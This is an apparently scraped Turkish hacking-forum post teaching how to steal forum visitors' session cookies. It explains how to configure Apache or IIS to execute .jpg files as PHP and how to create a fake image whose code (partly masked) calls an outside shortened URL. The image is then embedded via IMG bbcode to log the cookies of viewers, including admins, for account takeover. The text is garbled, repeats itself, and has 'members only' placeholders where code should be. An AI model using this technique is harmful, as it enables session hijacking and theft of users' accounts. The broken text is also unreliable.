Cookiler web sayfanızı ziyaret eden ziyaretçilere sonraki girişlerinde tanımak için bırakılan metin dosyalarıdır.Bu dosyalardaki bilgiler XSS saldırıları ile çalınabilinir ve o siteye sizin kullanıcı adınız ile cookie sayesinde oturum açabilirler.
Bazı portal ve forumlarda forumda kodu kullanılarakta cookie çalınabilmektedir.
Foruma mesaj atarken IMG tag ı içine
bu resmi çağırırsanız o konuya giren herkesin cookie bilgisi
adresinde loglanıcaktır.
Peki gelelim
nin nasıl cookie çaldığına burda jpg içine kod filan ekledikleri yok.Yapılan çok basit birşey tabi bunu daha önce apache server veya IIS kurduysanız anlarsınız.
Serverınızda apache veya IIS kurulu ise yapmanız gerekenler
Apache için
Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını bularak sonuna .jpg eklemek.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz
IIS de bu işlemi
Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazın işte IIS de de jpg uzantıyı php emrine vermiş olduk.
Daha sonra yapmanız gerekenler Yeni bir metin belgesi açıp içine
Kod:
********.********=’ https://tik.lat/kgK1x )
yazarak atıyorum turfan.jpg olarak farklı kaydetmek ondan sonra bun dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye bu bbcode arasında çağırmak
Log.php kodları:
Kod:
Bazı portal ve forumlarda forumda kodu kullanılarakta cookie çalınabilmektedir.
Foruma mesaj atarken IMG tag ı içine
İçeriği görüntülemek için üye olmalısınız.
İçeriği görüntülemek için üye olmalısınız.
Peki gelelim
İçeriği görüntülemek için üye olmalısınız.
Serverınızda apache veya IIS kurulu ise yapmanız gerekenler
Apache için
Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını bularak sonuna .jpg eklemek.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz
IIS de bu işlemi
Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazın işte IIS de de jpg uzantıyı php emrine vermiş olduk.
Daha sonra yapmanız gerekenler Yeni bir metin belgesi açıp içine
Kod:
********.********=’ https://tik.lat/kgK1x )
yazarak atıyorum turfan.jpg olarak farklı kaydetmek ondan sonra bun dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye bu bbcode arasında çağırmak
Log.php kodları:
Kod: